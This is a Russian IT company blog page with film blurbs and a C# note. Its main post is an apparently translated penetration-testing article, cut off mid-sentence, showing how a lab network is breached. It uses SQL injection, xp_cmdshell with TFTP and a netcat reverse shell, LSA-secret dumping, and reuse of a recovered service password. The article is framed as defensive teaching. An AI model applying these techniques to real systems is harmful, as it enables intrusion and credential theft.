Загрузка
IT Management Company
г. Одесса

ул. Гранитная 1, офис 42

Наше Android приложение

Будьте в курсе наших
акций и новостей

Наш блог

Каникулы строгого режима.

История о том, как двое не самых молодых людей, Кольцов и Сумароков, волею судьбы оказались вожатыми в пионерском лагере в компании в меру энергичного руководства и не в меру энергичных детей. Все бы ничего, да только попали они туда прямо с арестантской шконки. Сначала Кольцов, будучи весьма уважаемым профессиональным сотрудником МВД, имеющий за плечами две поездки в Чечню, вдруг по неосторожности совершает убийство своего коллеги. Стараниями родственников покойного попадает на «черную» зону, где ему не рад никто от руководящей элиты до зэков. Там он знакомится с Сумароковым. При содействии сотрудника колонии Гагарина мужчины бегут из тюрьмы и устраиваются вожатыми в пионерлагерь.   http://www.kinopoisk.ru/js/player15.swf Скачать ролик | Все ролики к фильму | Информация о фильме... год                                     2009 страна                             Россия слоган                              «Кино с гарантией» режиссер                         Игорь Зайцев сценарий                          Андрей Кивинов продюсер                         Джаник Файзиев , Анатолий Максимов , Николай Попов оператор                        Антуан Вивас-Денисов композитор                   Руслан Муратов жанр                              комедия , приключения , детектив сборы в России             $9 400 000 время                             113 мин http://www.kinopoisk.ru/js/player15.swf Скачать ролик | Все ролики к фильму | Информация о фильме... Смотрите, не пожалеете…


Yuriy O.

Наш блог

Transformers 2

Прошло два года с тех пор, как юный Сэм Уитвикки спас Вселенную, предотвратив глобальную битву между враждующими воинственными расами инопланетных роботов. Несмотря на свои героические подвиги, Сэм остается обычным подростком с обычными проблемами — поступление в колледж и родителями. Разумеется, отъезд будет тяжело воспринят лучшим другом, роботом — телохранителем Бамблби. Сэм изо всех сил пытается забыть о конфликте в Мишн Сити и вернуться к нормальной жизни. Однако битва между Автоботами и Десептиконами, несмотря на гриф полной секретности, многое изменила. Агент Симмонс оставил службу. Его секретный Сектор 7 расформирован, на его месте возникло агентство НЕСТ. Его руководители — Леннокс и Эпс, уже вступавшие в смертельное противостояние с Десептиконами, сотрудничают с Автоботами, чтобы не допустить такого в будущем. К сожалению, правительство не отдает себе отчет в том, что месть неминуема. Пытаясь получить полный контроль над военными силами страны и покончить с глупой (по его мнению) правительственной инициативой — агентством НЕСТ, советник по национальной безопастности Теодор Галловэй убежден в том, что угроза из космоса давно миновала и человечеству не должно быть дела до конфликта Автоботов и Десептиконов. Жизнь налаживается, и годы, которые предстоит провести Сэму в колледже, обещают массу интересного, благодаря бойкому соседу по комнате Лео и не менее бойкой, но куда более интересной для Сэма новой знакомой Эллис. Но вдруг Сэма начинают посещать видения. Они поражают его подобно молниям, и Сэм хранит их в секрете, опасаясь, что причиной может оказаться случайно оставшийся у него после прошлого приключения осколок инопланетного энергетического куба. Несмотря на далеко идущие планы, Сэм снова оказывается вовлечен в войну между Автоботами и Десептиконами. Он не сразу понимает, что именно он сам и является ключом к разрешению вселенского противостояния Добра и Зла. Сэм и его друзья: Микаэла, Оптимус Прайм, Бамблби, Айрон Хайд, парни из НЕСТ следуют семейному завету Уитвикки: Без жертв нет победы! http://www.kinopoisk.ru/js/player14.swf Скачать ролик | Все ролики к фильму | Информация о фильме...


Yuriy O.

Наш блог

Прикол

http://1.vkadre.ru/VkontaktePlayer.swf?14 http://vkontakte.ru/video.php?act=s&id=91656032  


Yuriy O.

Наш блог

C#

Справочники по языку C# Ключевые слова C# Ключевые слова — это предопределенные зарезервированные идентификаторы, имеющие определенное значение для компилятора. В программах их можно использовать в качестве идентификаторов только при условии добавления к ним префикса @. Например, @if является допустимым идентификатором, в отличие от if, который является ключевым словом. Операторы C# В языке C# предусмотрен широкий набор операторов, представляющих собой символы, обозначающие операции, выполняемые в рамках выражения. В языке C# имеются обычные арифметические и логические операторы, а также множество других. Кроме этого, многие операторы могут быть перегружены пользователем, что приводит к изменению их значения при применении к определенному пользователем типу. Директивы препроцессора C# Сведения о директивах C# для условной компиляции. Компоненты языка C# Сведения о массивах, методе Main, свойствах, индексаторах, передаваемых параметрах и других компонентах языка Учебники по языку C# В учебниках по C# представлен обзор основ языка и отмечены его важные свойства. В каждый учебник входят один или несколько примеров программ. В учебниках обсуждается пример кода и предоставляются дополнительные справочные сведения. Они ссылаются также на соответствующие примеру краткие разделы, в которых можно загрузить и запустить примеры программ.


Yuriy O.

Наш блог

Как злоумышленник может проникнуть в вашу сеть

Одна из главных тайн, связанных с управлением безопасностью, - методы, используемые криминальными хакерами. Разве можно защититься от атак, если вы не знаете, как они осуществляются? Готовьтесь к просветлению. В этой статье я не собираюсь учить, как взломать защиту, а хочу показать, как злоумышленники могут воспользоваться вашими оплошностями. Благодаря этому вы избежите многих распространенных ошибок, облегчающих задачу криминальным хакерам. Для начала пара слов о тестировании на возможность проникновения в систему (penetration testing). Прежде всего неграмотное проведение этого тестирования может негативно сказаться на стабильности сети. Некоторые инструменты, применяемые хакерами (с любой целью, не только со злым умыслом), разработаны для проверки сети на предмет уязвимости. Инструменты хакеров и программы, использующие дыры в защите систем, не всегда работают корректно, могут дестабилизировать систему или всю сеть и привести к другим непредвиденным последствиям. Специалист знает, что можно сделать с сетью, не нарушив ее работу, и когда следует остановиться. Любитель обычно этого не чувствует. При защите сети полезно быть слегка параноиком. Одной из грубейших ошибок, которые может допустить системный администратор, является предположение, что все в порядке. Не доверяйте заявлениям о том, будто сеть надежно защищена. Очень часто вы будете получать от консультантов по безопасности отчеты, содержащие именно такой вывод, и то лишь потому, что им не удалось обнаружить уязвимости. Разумеется, из этого не следует, что сеть на самом деле защищена! Это лишь означает, что конкретным людям не удалось взломать сеть, но кто­то другой может оказаться более удачливым. Сеть-мишень Большинство современных сетей создано по принципу яйца: окруженные надежной оболочкой, они практически беззащитны внутри. Это означает, что, если хакер сможет получить в сети "точку опоры", остальные компьютеры падут, как костяшки домино. После проникновения в сеть самой сложной задачей хакера часто является определение следующей мишени и хранилища по­настоящему "вкусной" информации. Так быть не должно. Опираясь на адекватные методики, сетевые администраторы могут достигнуть двух важнейших целей: значительно затруднить захват точки опоры и ее использование для взлома других компьютеров. Прежде чем я начну атаковать сеть, давайте поговорим о том, с чем мне придется столкнуться. Ясно, что в реальных условиях у хакеров редко бывают в распоряжении полные схемы сетей, но в нашем случае рассмотреть конфигурацию сети­мишени лишним не будет ( рис. 1 ). Рис. 1. Сеть-мишень Как показано на иллюстрации, моя сеть­мишень представляет собой стандартную подсеть с двумя межсетевыми экранами, отделяющими ее от Интернета и остальной сети. По периметру сеть сконфигурирована обычным образом: она включает Web­сервер, сервер баз данных и контроллер домена (DC) демилитаризованной зоны (DMZ). Во внутренней части имеется корпоративный контроллер домена, получение контроля над которым и является конечной целью хакера. Единственный необычный аспект этой сети, пожалуй, в том, что Web­сервер и контроллер домена DMZ выполняют функции маршрутизаторов. Это объясняется особенностями модели сети. Я создал ее на основе виртуальных машин, выполняемых в среде Microsoft Virtual PC 2004, чтобы эту модель можно было брать с собой для проведения демонстраций. На одном компьютере реалистично запускать лишь две виртуальные машины, т. е. для "развертывания" всей сети нужно вдвое меньше хостов. Если бы я использовал отдельные маршрутизаторы, мне пришлось бы брать с собой три ноутбука, а делать это мне бы не хотелось. Таким образом, я возложил на Web­сервер и контроллер домена DMZ функции маршрутизаторов, чтобы уменьшить число необходимых компьютеров (хостов). Уверяю вас, что эта несколько необычная конфигурация никак не влияет на то, что мы будем здесь обсуждать. На первом этапе взлома любой сети нужно определить объект атаки - точку опоры в сети­мишени. При этом злоумышленников, в частности, интересуют: диапазоны сетевых адресов; имена хостов; доступные хосты; приложения, доступные на этих хостах; данные о версиях ОС и приложений; сведения о пакетах исправлений, установленных на хостах; структура приложений и внутренних серверов. Давайте же обсудим, какую информацию хакер может получить и как он может это сделать. Диапазоны сетевых адресов и имена хостов Следующий этап взлома - определение логического расположения атакуемых сетей. Допустим, я хочу выполнить тестирование на возможность проникновения в системы домена contoso.com. Я начал бы пытаться взломать их с определения того, какие сети зарегистрированы в этом домене. Возможно, еще больший интерес представляют не открыто зарегистрированные диапазоны адресов contoso.com, а данные о сетях, связанных с сетью­мишенью, например об экстрасети или сетях деловых партнеров компании Contoso. Вполне вероятно, что легче будет взять под контроль домен poorsecurity.com и только потом атаковать contoso.com. Как прочность цепи определяется прочностью ее самого слабого звена, так и надежность защиты сети определяется связанной с ней сетью с самой слабой защитой (включая все подключенные к ней виртуальные частные сети). Далее хакер должен узнать имена хостов. Иногда это удается сделать, выполнив запросы nslookup для крупных фрагментов сети, а в ряде случаев даже осуществить так называемую зонную передачу. Зонная передача (zone transfer) - это просто запрос, в результате которого DNS­сервер возвращает копию данных обо всей демилитаризованной зоне (список имен всех зарегистрированных в сети хостов). Хотя при большинстве атак знать имена хостов необязательно, это может значительно упростить атаку. Так, если вам известно имя сервера, на котором выполняется IIS, вы часто можете вычислить анонимную учетную запись IIS на этом хосте, так как обычно она называется IUSR_имя_хоста. Теперь предположим, что администратор настроил для Web­сервера блокировку учетных записей (account lockout). Для вывода Web­сервера из строя хакеру нужно лишь отправить ему большое число запросов на аутентификацию под учетной записью IUSR_имя_хоста. За считанные секунды серверу можно отправить столько неверных паролей, что этого будет достаточно для блокировки учетной записи анонимного пользователя. Продолжая отправлять достаточное число неверных паролей, хакер может добиться того, что Web­сервер не сможет обслуживать реальные запросы. Доступные хосты и приложения Имена хостов - полезная информация, но еще больше хакера интересуют доступные (exposed) хосты. На этом этапе атаки я пытаюсь обнаружить легкие цели. Иногда это совсем просто. Вполне возможно, что для этого даже не потребуются никакие хакерские инструменты, если на периметре сети трафик ICMP (Internet Control Message Protocol) не блокируется. В этом случае достаточно выполнить следующую команду: c:discoverHosts 192.168.2 192.168.2.30 Ясно, что IP­адрес нужно было бы скорректировать с учетом соответствующего диапазона адресов. Однако в этом примере я просто отправляю эхо­запрос ICMP каждому хосту конкретной сети. Если трафик ICMP не блокируется, на экран будет выведен список корректных адресов в сети. В подавляющем большинстве случаев трафик ICMP следует перенаправлять на границе сети в /dev/null. Даже примитивные межсетевые экраны должны блокировать трафик ICMP, но администраторы на удивление часто забывают проверить, блокируется ли он на самом деле. Никакие ответы на ICMP­запросы отправлять не следует. Это не предотвратит перечисление хостов, но значительно затруднит такую операцию, поскольку хакеру придется использовать специальные инструменты вроде сканера портов. Сканер портов - это программа, которая пытается соединиться с портами целевого хоста и сообщает, удалось ли ей это. Если да, значит, хост прослушивает соответствующий порт. Если соединение установить не удалось, обычно это означает, что конкретный порт закрыт. Самым популярным типом сканирования портов является сканирование с флагом SYN - при этом хакер пытается установить обычное соединение с целевым хостом. Если хост прослушивает данный порт, соединение будет установлено и сканер портов уведомит хакера о том, что порт открыт. На сканирование портов даже всех хостов в сети требуется совсем немного времени. Сканируя грамотно выбранные диапазоны портов, вы можете получить огромный объем информации о том, что именно доступно в конкретной сети. Сканирование портов позволяет узнать, какие выполняемые на хосте приложения доступны другим системам, что указывает возможные направления атаки. В число приложений, которые обычно интересуют хакеров, входят FTP­клиенты и серверы, Telnet, почтовые серверы и Web­серверы HTTP. Информация о версиях ПО и пакетах исправлений Информация о версиях приложений, выполняемых на целевом компьютере, очень полезна, если вам удастся ее получить. Например, многие приложения отправляют подключающимся к ним хостам тот или иной заголовок. Так сконфигурировано большинство SMTP­ и POP­серверов, а также многие Web­серверы. Однако в нашем случае сеть­мишень включает компьютеры, работающие под управлением Windows Server 2003 и выполняющие IIS 6.0, а IIS 6.0 не отправляет заголовки с какой­либо полезной для хакера информацией. Кроме того, хакера очень интересует, какие пакеты исправления установлены на доступные серверы. Эту информацию можно получить разными способами. Иногда все, что нужно знать, находится в заголовках, отправляемых приложениями. Так, заголовки sendmail обычно включают номер версии демона. Если вам известно, в каких версиях sendmail все еще не устранена та или иная брешь, больше ничего знать и не нужно. В других случаях вы можете узнать, установлено ли в системе конкретное исправление, по ее ответам на запросы. По сути, именно на этом основана работа хороших сканеров брешей в защите систем и инструментов определения операционных систем. Наконец, вы всегда можете запустить программу, использующую конкретную дыру в защите систем, и посмотреть, что получится. Многие сканеры брешей в защите так и делают перед атаками типа "отказ в обслуживании". Если после атаки система реагирует на запросы, скорее всего она надежно защищена от таких атак. Структура приложений и внутренних серверов Очень полезной часто оказывается информация о структуре приложений и внутренних серверов, если таковые имеются. Как правило, получить ее очень сложно, но иногда удача улыбается хакерам. Например, в сети­мишени выполняется некое Web­приложение с очень специфическими именами файлов и дизайном страниц. Если это так, хакеру сразу же станет ясно, что это за приложение. Если злоумышленник знаком с приложением, ему могут быть известны и способы его взлома. Так, в приложении может использоваться конфигурационный файл %webroot%system.config. Если Web­сервер не блокирует доступ к файлам с расширением .config, хакер может просто запросить этот файл в браузере. В худшем для хакера случае он узнает только имена внутренних серверов, баз данных или что­то подобное, в лучшем - имя пользователя и пароль для установления соединения между Web­сервером и сервером базы данных. Не думайте, будто я преувеличиваю. Именно с такой ситуацией я столкнулся несколько месяцев назад, пытаясь хоть как­то сделать сеть одного из клиентов более защищенной. Очень многие коммерческие Web-приложения написаны на редкость плохо, что, по сути, делает их "потайными ходами" (backdoors) в сеть. Теперь у меня есть практически вся информация, нужная для начала атаки. Первым делом я должен захватить в сети начальную точку опоры - так сказать, проколоть яичную скорлупу. Начальная атака Допустим, первоначальный анализ сети­мишени показал, что на входящие в нее системы установлены все исправления и что ее защищает по­настоящему надежный межсетевой экран, блокирующий все порты, кроме 80 и 443 (порты HTTP и HTTPS по умолчанию). Что делать дальше? Вспомните, что я сказал про потайные ходы. Где их можно обнаружить? С чем я имею дело? Прежде всего следует изучить то, что доступно, т. е. Web­приложение. Главная страница Web­сервера показана на рис. 2 . По ней одной можно сказать, что сайт предназначен для заказа какой­то продукции. Давайте воспользуемся обычной учетной записью, чтобы получить больше информации о системе. Рис. 2. Главная страница сайта contoso.com На следующей странице выводится информация о книжном магазине Pubs и список продаваемых книг. Кроме того, на ней показывается введенное мной имя пользователя. Это может оказаться мне на руку, если администраторы сайта были невнимательны, потому что я смогу попробовать ряд других методик. Например, у меня есть подозрение, что на этом сайте реализован плохой алгоритм проверки имен пользователей и паролей (смелое заявление, если учесть, что я сам написал этот алгоритм!). Меня также интересует, насколько полно проверяются данные, введенные в поле имени пользователя. Чтобы узнать это, применим методику, называемую атакой с внедрением SQL­кода (SQL injection attack). Введем вместо имени пользователя следующую строку: foo' OR 1=1;-- Это приводит к результатам, показанным на рис. 3 . Рис. 3. Вставка SQL-кода (и кросс-сайтовое выполнение сценариев) в действии Как видите, я не просто вошел в систему, но приложение еще и вывело указанное мной "имя пользователя". Это отдельная брешь, из­за которой становится возможным так называемое кросс­сайтовое выполнение сценариев (cross­site scripting, CSS); при этом введенная пользователем информация отображается на экране без предварительной обработки. Ясно, что никакого пользователя с именем "foo' OR 1=1;­­" быть не может, так почему же мне удалось войти в систему? Все дело в безграмотном проектировании приложения. В нем предполагается, что если в ответ на ввод имени пользователя с конкретным паролем база данных вернула какие­либо результаты, учетные данные корректны и вход в систему следует разрешить. Проводя атаку, основанную на внедрении SQL­кода, я переписал запрос базы данных, включив в него выражение OR 1=1. Это условие истинно, поэтому весь запрос интерпретируется как истинный для всех записей в базе данных. В результате этого возвращаются учетные данные всех пользователей, содержащиеся в базе данных, а это означает, что приложение разрешило мне войти в систему. Теперь я могу отдавать произвольные команды серверу базы данных. Я воспользуюсь этой возможностью для атаки с расширением привилегий (elevation of privilege attack). Расширение привилегий Как вы уже видели, сервер базы данных из Интернета напрямую не доступен, а на внешний сервер установлены все исправления, из­за чего он неуязвим перед всеми известными атаками. На этом этапе моей целью является расширение привилегий, чтобы стать внутренним пользователем (желательно высокопривилегированным) на одной из систем сети­мишени. Для этого я воспользуюсь внедрением SQL­кода. Опираясь на эту методику, я отправлю серверу базы данных ряд команд, чтобы он кое­что для нас сделал. Я не могу подключиться непосредственно к серверу базы данных, поэтому я просто укажу ему, чтобы он сам установил для меня соединение, только перед этим я создам во внешней сети слушатель портов. Прежде чем я смогу отдавать команды серверу базы данных, нужно установить кое­какие программы на Web­сервер. Это важно, потому что, вообще говоря, хакерские утилиты по умолчанию в операционной системе не устанавливаются. Для этого можно использовать TFTP (Trivial File Transfer Protocol) - протокол, не требующий установления логических соединений и применяемый в основном для загрузки бездисковых рабочих станций. Клиентское приложение TFTP устанавливается на все системы Windows по умолчанию (за исключением Windows Server 2003 с Service Pack 1 и более поздних версий), поэтому, если его никто не удалил, оно будет доступным. Так как система уязвима перед атакой с внедрением SQL­кода, я могу отдать серверу базы данных команду загрузить из сети программу netcat по протоколу TFTP. Netcat - это сетевая утилита, похожая на telnet, но отличающаяся от нее отсутствием аутентификации и гораздо большей универсальностью. Она свободно доступна в Интернете и даже входит в состав многих дистрибутивов UNIX и Linux. Ее часто используют хакеры, поэтому оставлять ее в системе без крайней необходимости нельзя. Этот этап атаки основан на вызове хранимой процедуры xp_cmdshell, которая устанавливается в SQL Ser­ver по умолчанию и применяется для выполнения команд ОС. (Расширенная процедура xp_cmdshell - мощное средство, доступное по умолчанию только системным администраторам. Разработчики SQL Server не рекомендуют разрешать ее выполнение другим пользователям. Кроме того, некоторым системным администраторам эта процедура не нужна. В SQL Server 2005 она устанавливается только по требованию, что создает дополнительный уровень безопасности. Заметьте, что в сценарии, описываемом в этой статье, Web­приложение подключается к базе данных в контексте учетной записи sa, т. е. взломщик является системным администратором.) Я воспользуюсь этой процедурой для запуска TFTP и закачки моих утилит на сервер базы данных. В большинстве сред потребность в процедуре xp_cmdshell возникает редко, поэтому ее можно заблокировать для защиты от атаки, которую я как раз сейчас и провожу. После закачки netcat на сервер я указываю этой утилите создать сокет, после чего передаю его как stdin, stdout и stderr в вызове cmd.exe. Звучит сложно, но работает прекрасно. Результат - установление исходящего соединения, позволяющего передавать через сокет команды с помощью командной оболочки. Теперь в моем распоряжении есть командная оболочка на удаленном компьютере: c:>nc -l -p 12345 Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:WINNTsystem32>hostname hostname PYN-SQL Итак, я получил первую точку опоры, сделав очередной шаг к захвату сети. Я расширил свои привилегии, став внутренним пользователем вместо удаленного анонимного. Чтобы узнать тип пользователя, я должен сначала загрузить в систему остальные утилиты. Я воспользуюсь ими для расширения локальных привилегий в случае надобности, а также для взлома остальных систем сети. Эти утилиты также можно передать, используя tftp.exe. После этого я могу проверить свои учетные данные на взломанной системе: C:warez>whoami whoami NT_AUTHORITYSYSTEM Ну вот, я уже и LocalSystem! То есть SQL Server выполнил процедуру xp_cmdshell в контексте LocalSystem, и я полностью взломал внутренний сервер базы данных. Можно приступать к взлому других систем. Взлом других компьютеров Итак, я проткнул скорлупу яйца, и теперь моя цель - полностью "завладеть" сетью. Однако перед этим стоит получше изучить мишень с помощью утилиты dumpinfo ( листинг 1 ), которая получает информацию о системе, используя для этого null­сеанс - анонимное соединение (т. е. соединение, устанавливаемое без аутентификации). Листинг 1. Информация о локальном хосте, выведенная dumpinfo C:warez>dumpinfo 127.0.0.1 The Administrator is: PYN-SQLAdministrator Users on PYN-SQL: RID 1000 PYN-SQLTsInternetUser a User RID 1001 PYN-SQLSQLDebugger a User Share Type Comment IPC$ Unknown Remote IPC ADMIN$ Special Remote Admin C$ Special Default share Administrators: PYN-SQLAdministrator PYN-DMZ_ids PYN-DMZDomain Admins Опираясь на эти данные, можно сделать вывод, что в данной системе не так уж много интересного; она очень похожа на систему по умолчанию. Перед продолжением атаки предлагаю немного осмотреться. Запустив ipconfig.exe ( листинг 2 ), я могу узнать свой IP­адрес и конфигурацию системы. Обратите внимание, что у этого компьютера частный адрес, так что мое соединение, должно быть, осуществляется через маршрутизатор с NAT, имеющий адрес 172.17.0.1. Эта информация еще пригодится. Листинг 2. Информация о хосте PYN-SQL, выведенная ipconfig C:warez>ipconfig /all Windows 2000 IP Configuration Host Name . . . . . . . . . . . . : PYN-SQL Primary DNS Suffix . . . . . . . : PYN-DMZ.LOCAL Node Type . . . . . . . . . . . . : Mixed IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No DNS Suffix Search List. . . . . . : PYN-DMZ.LOCAL Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Intel 21140 Based PCI Fast Ethernet Adapter Physical Address. . . . . . . . . : 00-03-FF-03-3E-F0 DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 172.17.0.3 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 172.17.0.1 DNS Servers . . . . . . . . . . . : 172.17.0.2 Теперь хакер попытался бы найти в защите дыры, которые легко использовать. Наверное, проще всего задействовать учетные записи служб сетевого доступа к общим ресурсам, если таковые службы имеются. Высокая вероятность успеха этой атаки объясняется тем, что самый легкий способ конфигурирования таких служб на множестве систем - их запуск на этих системах под одними и теми же доменными учетными записями. В некоторых средах используются локальные учетные записи, но их учетные данные совпадают на большинстве систем. И если мы найдем какие­либо службы, выполняемые под учетными записями обычных пользователей (а не системными вроде LocalSystem, NetworkService и LocalService), то они скорее всего применяются во многих системах. Чтобы узнать, реалистична ли эта атака, проверим, под какой учетной записью работают службы на взломанном мной сервере базы данных: C:warez>serviceuser \PYN-SQL IDS PYN_DMZ_ids Как видите, мы обнаружили учетную запись домена, задействованную для выполнения службы IDS (вероятно, это служба Intrusion Detection Service). Может ли это оказаться полезным? Пожалуй, следует узнать более подробную информацию об этой учетной записи командой net ( листинг 3 ). Листинг 3. Перечисление локальных администраторов C:warez>net localgroup administrators Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain. Members ---------------------------------------------- Administrator PYN-DMZDomain Admins PYN-SQLAdministrator PYN-DMZ_ids The command completed successfully. The _ids account is a domain account; and it is a local administrator. Конечно, было бы лучше, если бы это была доменная учетная запись, но и полученный результат вселяет оптимизм. Чтобы понять, что можно сделать с этой учетной записью, нужно знать кое­какие детали работы Windows. Службы - это приложения, запускаемые при загрузке системы. Как и любые другие процессы в системе, службы должны выполняться под идентификацией какого­то пользователя. При запуске службы ОС аутентифицирует учетную запись, используемую для выполнения этой службы. Для этого системе нужны имя пользователя и пароль, которые хранятся в компоненте Local Security Authority (LSA) Secrets. Подсистема LSA хранит в нем некоторую конфиденциальную информацию, такую как данные учетных записей компьютера и служб, а также шифровальные ключи. "Секреты" LSA содержатся на диске в зашифрованном виде и дешифруются операционной системой при загрузке компьютера. Пока компьютер работает, они присутствуют в адресном пространстве процесса LSA в незашифрованном виде. Для получения этой информации к процессу LSA нужно подключить отладчик. Это может показаться сложным, но существуют утилиты, разработанные специально с этой целью. Имейте в виду, что LSA работает в контексте Local­System, а подключить отладчик к процессу, выполняемому как LocalSystem, может не каждый - это было бы серьезной брешью в защите и противоречило бы всем моделям обеспечения безопасности. Как бы то ни было, эта возможность есть у всех пользователей, имеющих право SeDebugPrivilege, т. е. по умолчанию только у членов группы Administrators. Защита системы от этого не страдает, потому что администраторы и так могут делать что угодно, в том числе предоставить себе право SeDebugPrivilege. Проблема возникает, когда эту привилегию получают недоверяемые пользователи. В данном случае мне незачем волноваться об этом, потому что моя командная оболочка на удаленном компьютере выполняется в контексте LocalSystem. Иными словами, я работаю в том же контексте, что и процесс LSA, а потому могу подключать к нему отладчик независимо от того, есть у меня эта привилегия или нет. В листинге 4 показан вывод утилиты Lsadump в усеченном виде; по­настоящему интересный фрагмент находится в самом конце, где сообщаются данные учетной записи службы. Как видите, в правом столбце находится пароль учетной записи службы. Теперь мне известно имя пользователя службы (_ids) и его пароль ("idsPasswd!"); наличие точек в пароле объясняется тем, что он представлен в формате Unicode, поэтому точки следует рассматривать как null. Нам осталось выяснить, на каком компьютере нужно воспользоваться этой учетной записью. Выполнение команды ping для всех хостов подсети показывает, что в ней есть лишь два других компьютера с адресами 172.17.0.1 (шлюз) и 172.17.0.2 (DNS­сервер). Думаю, стоит узнать о них побольше. Для этого я снова воспользуюсь утилитой dumpinfo. По умолчанию в null­сеансе некоторые Windows­системы предоставляют больше информации, чем другие. Типичный результат показан в листинге 5 . Листинг 4. Вывод lsadump C:warez>lsadump2 $MACHINE.ACC 13 FE 4C 3A 04 F8 1F 94 75 C8 9B 0B 1C 35 45 7A ..L:....u....5Ez 52 7E 25 DF F8 17 F2 96 3A 35 81 C7 R~%.....:5.. DefaultPassword DPAPI_SYSTEM 01 00 00 00 C8 AA F8 8C 36 C7 69 CC DD 42 CB 15 ........6.i..B.. 3F 4E 07 6D 48 05 0A 4C FE 31 87 C9 F2 58 A3 AD ?N.mH..L.1...X.. B7 AD 13 20 26 11 24 24 FF 79 AE D3 ... &;.$$.y.. ... _SC_IDS 69 00 64 00 73 00 50 00 61 00 73 00 73 00 77 00 i.d.s.P.a.s.s.w. 64 00 21 00 d.!. Листинг 5. Информация о шлюзе, выведенная dumpinfo C:warez>dumpinfo 172.17.0.1 Unable to look up the local administrator Unable to enumerate users because I could not get the Admin Sid Share Type Comment IPC$ Unknown Remote IPC ADMIN$ Special Remote Admin wwwroot$ Disk C$ Special Default share Administrators: Unable to enumerate administrators ERROR: Access Denied Информация об этой системе довольно скудна, потому что она является рядовым сервером под управлением Windows Server 2003. Учтите, что в случае автономных и рядовых серверов под управлением Windows Server 2003 null­сеанс позволяет перечислить только общие ресурсы системы, а не пользовательские учетные записи по умолчанию. Однако, судя по выводу dumpinfo, на основном шлюзе (default gateway) работает Web­сервер; это следует из наличия общего каталога wwwroot$. Заметьте, что я получил список всех так называемых скрытых общих каталогов (с постфиксом $). Знак доллара просто уведомляет API­функции на клиентской стороне о том, что отображать этот элемент не следует, но dumpinfo это уведомление игнорирует. Также было бы неплохо узнать, какие службы активны в этой системе, - так мы сможем определить, какие типы соединений она поддерживает. И вновь на помощь приходит сканер портов: C:warez>portscan 172.17.0.1 Port 172.17.0.1:80 open Port 172.17.0.1:135 open Port 172.17.0.1:139 open Port 172.17.0.1:445 open Port 172.17.0.1:3389 open Это на самом деле мало что дает мне, но подтверждает, что я могу установить со шлюзом/Web­сервером соединения SMB (порты 139 и 445) и Terminal Services (порт 3389). Чуть позже эта информация нам очень пригодится. Давайте пока получше ознакомимся с другой системой, информация о которой показана в листинге 6 . Листинг 6. Информация о DNS-сервере, выведенная dumpinfo C:warez>dumpinfo 172.17.0.2 The Administrator is: PYN-DMZAdministrator Users on PYN-DMZ-DC: RID 1000 PYN-DMZHelpServicesGroup an Alias RID 1001 PYN-DMZSUPPORT_388945a0 a User RID 1002 PYN-DMZTelnetClients an Alias RID 1003 PYN-DMZPYN-DMZ-DC$ a User RID 1104 PYN-DMZDnsAdmins an Alias RID 1105 PYN-DMZDnsUpdateProxy a Group RID 1106 PYN-DMZFAjenstat a User RID 1107 PYN-DMZAAlberts a User RID 1108 PYN-DMZHAcevedo a User RID 1109 PYN-DMZMAlexander a User RID 1110 PYN-DMZKAkers a User RID 1111 PYN-DMZTAdams a User RID 1112 PYN-DMZKAbercrombie a User RID 1113 PYN-DMZSculp a User RID 1114 PYN-DMZSAbbas a User RID 1115 PYN-DMZMAllen a User RID 1116 PYN-DMZJAdams a User RID 1117 PYN-DMZSAlexander a User RID 1118 PYN-DMZHAbolrous a User RID 1119 PYN-DMZPAckerman a User RID 1120 PYN-DMZGAlderson a User RID 1121 PYN-DMZPYN-SQL$ a User RID 1122 PYN-DMZPYN-WEB$ a User RID 1123 PYN-DMZ_IDS a User Share Type Comment IPC$ Unknown Remote IPC NETLOGON Disk Logon server share ADMIN$ Special Remote Admin SYSVOL Disk Logon server share C$ Special Default share Administrators: Unable to enumerate administrators ERROR: Access Denied Должно быть, это контроллер домена, потому что имена доменных учетных записей начинаются с PYN­DMZ, а хост имеет имя PYN­DMZ­DC. По умолчанию контроллеры домена в Windows Server 2003 конфигурируются так, чтобы обеспечить их совместимость с контроллерами домена, работающими под управлением более ранних версий Windows Server (down­level compatibility). Они предоставляют анонимным пользователям доступ ко всей информации за исключением списка администраторов. Ради полноты картины просканируем порты этой системы: C:warez>portscan 172.17.0.2 Port 172.17.0.2:53 open Port 172.17.0.2:135 open Port 172.17.0.2:139 open Port 172.17.0.2:389 open Port 172.17.0.2:445 open Port 172.17.0.2:3268 open Состояние порта 3268 свидетельствует о том, что данная система скорее всего является сервером глобального каталога для леса. Это делает ее очень привлекательной мишенью. Любопытно, что службы Terminal Services на этом компьютере не активированы. Я все еще не знаю, на каком компьютере используется учетная запись _ids, и попытаюсь выяснить это методом проб. Испытывать ее на контроллере домена нет смысла, так как мне известно, что на нем нет такой учетной записи. Обратим взор на Web­сервер. Перед проверкой учетной записи на Web­сервере нужно узнать его имя. Я применю утилиту GetSystemInfo: C:warez>GetSystemInfo 172.17.0.1 Server info on 172.17.0.1 Name: PYN-WEB Domain: PYN-DMZ Version: 5.2 Platform ID: 500 Comment: Server Flags: Workstation Server Dial-in Server GetSystemInfo - очень простая программа, которая подключается к системе и запрашивает у нее информацию из раздела реестра HKLMSoftwareMicrosoftWindows NTCurrentVersion. Как видите, система называется PYN­WEB. Я все еще не знаю, как ее взломать, но могу попробовать следующее: C:warez>serviceuser \PYN-WEB IDS PYN-DMZ_ids Я почти добрался до нужной информации, потому что на Web­сервере также выполняется служба IDS под той же учетной записью. Теперь можно пробовать учетную запись _ids: C:warez>net use \172.17.0.1c$ /u:pyn-dmz_ids idsPasswd! The command completed successfully. Я взял под контроль Web­сервер! Моя очередная цель - захватить сам домен и использовать его как плацдарм для получения контроля над корпоративным доменом. Получение контроля над доменом На данный момент я взломал сервер базы данных и Web­сервер (по сути, все, кроме контроллера домена). Но что я получил, взломав Web­сервер? Чтобы узнать это, я должен закачать на сервер свои программы и запустить на нем командную оболочку, как и в случае сервера базы данных. Теперь сделать это чуть проще, потому что мне доступно административное SMB­соединение с Web­сервером, обеспечивающее легкий доступ к нему. Например, сейчас я могу запланировать выполнение какой­либо команды или запустить в удаленном режиме ту или иную командную оболочку. Получив в свое распоряжение локальную командную оболочку, я могу 